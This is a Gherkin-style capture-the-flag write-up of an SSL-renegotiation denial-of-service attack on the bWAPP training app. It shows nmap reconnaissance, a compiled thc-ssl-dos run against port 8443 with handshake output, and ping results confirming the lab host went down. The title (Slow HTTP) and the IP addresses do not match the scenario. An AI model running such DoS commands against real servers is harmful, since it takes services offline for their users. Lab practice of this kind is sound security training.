# language: en

Feature: Denial Of Service (Slow Http DoS)
  From system bWAPP
  From the A5 - Security Misconfiguration
  With Low security level
  Background:
    Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
    And I am running nmap 7.40v
    And I am running thc-ssl-dos
    Given the following in the url
      """
      URL: http://localhost/bWAPP/sm_dos_4.php
      Message: Denial of Service - (SSL-Exhaustion)
      Details:
      - The Lighttpd web server is vulnerable to SSL-exhaustion attacks!
      - Hint: Port 8443
      Objective: Launch an SSL DOS on the server
      """

  Scenario: Denial Of Service (SSL exhaustion)
    This SSL DoS it's based on the renegotiation
    of connection keys multiple times during the
    handshake and since the SSL handshake process
    consumes 15 times more resources from the
    server, hundreds of request can crash the
    server.
    Given the kind of attack
    Then I proceed to gather some information first
      """
      # Nmap on target server
      skhorn@Morgul ~/D/t/katoolin> nmap -sV 192.168.56.101 -p 8443

      Starting Nmap 7.40 ( https://nmap.org ) at 2018-07-24 15:44 -05
      Nmap scan report for 192.168.56.101
      Host is up (0.00039s latency).
      PORT     STATE SERVICE  VERSION
      8443/tcp open  ssl/http nginx 1.4.0
      """
    Then I see the nginx service using the ssl extension
    Then I download thc-ssl-dos from git
    And compile it
    When I execute the thc-ssl-dos command to launch the attack
      """
      # thc-ssl-dos
      skorn@Morgul ~/D/t/t/src> ./thc-ssl-dos 192.168.75.128 8443 --accept
      ...
      ...
      ...

      Greetingz: the french underground

      Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
      Handshakes 0 [0.00 h/s], 5 Conn, 0 Err
      Handshakes 57 [57.79 h/s], 8 Conn, 0 Err
      Handshakes 143 [86.02 h/s], 9 Conn, 0 Err
      Handshakes 233 [89.80 h/s], 12 Conn, 0 Err
      Handshakes 323 [90.01 h/s], 15 Conn, 0 Err
      Handshakes 411 [87.96 h/s], 19 Conn, 0 Err
      Handshakes 517 [100.72 h/s], 22 Conn, 0 Err
      ...
      ...
      ...
      """
    Then I should see it's down by using ping
      """
      #
      the target [hint: TCP reconnect for every handshake].
      skorn@Morgul ~/D/t/t/src> ping 192.168.75.128
      PING 192.168.75.128 (192.168.75.128) 56(84) bytes of data.
      From 192.168.75.1 icmp_seq=1 Destination Host Unreachable
      From 192.168.75.1 icmp_seq=2 Destination Host Unreachable
      From 192.168.75.1 icmp_seq=3 Destination Host Unreachable
      ^C
      --- 192.168.75.128 ping statistics ---
      6 packets transmitted, 0 received, +3 errors, 100% packet loss, time
      5125ms
      pipe 4
      """
